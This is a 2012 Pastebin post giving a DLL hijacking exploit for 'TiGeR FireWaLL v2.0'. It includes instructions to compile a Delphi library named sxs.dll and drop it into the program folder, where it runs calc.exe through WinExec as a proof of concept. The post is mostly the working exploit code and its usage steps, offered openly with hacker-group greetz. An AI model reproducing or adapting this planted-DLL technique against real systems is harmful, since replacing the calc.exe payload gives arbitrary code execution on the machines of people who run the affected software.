Advertisement
5rabq8

TiGeR FireWaLL v2.0 DLL Hijacking Exploit (sxs.dll)

Apr 9th, 2012
172
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.66 KB | None | 0 0
  1. =============================================
  2. TiGeR FireWaLL v2.0 DLL Hijacking Exploit (sxs.dll)
  3. ==============================================
  4.  
  5. /*
  6. #TiGeR FireWaLL v2.0 DLL Hijacking Exploit (sxs.dll)
  7. #Author : Dr.5RaB
  8. #Greetz : 9Y3H.511 , HaCkErS eV!L , ViP 511 , , Sam7tk HaCkEr , Mr.Adis , Mr.JL6h , HmooDi , Dmar Al3no0oZ , Jn0n H4x0r , Dr.MeShAl , X-SHADOW
  9. #Tested on: Windows 7 Ultimate
  10.  
  11. #How to use :
  12.  
  13. Take only the codes and put it in Delphi and Save by name (sxs.dll) and put it in the program folder
  14.  
  15. #sxs.dll (code)
  16. */
  17.  
  18.  
  19. library Project2;
  20.  
  21. uses
  22. Windows;
  23. begin
  24. Winexec(PAnsichar('C:\windows\system32\calc.exe'),sw_show);
  25. end.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement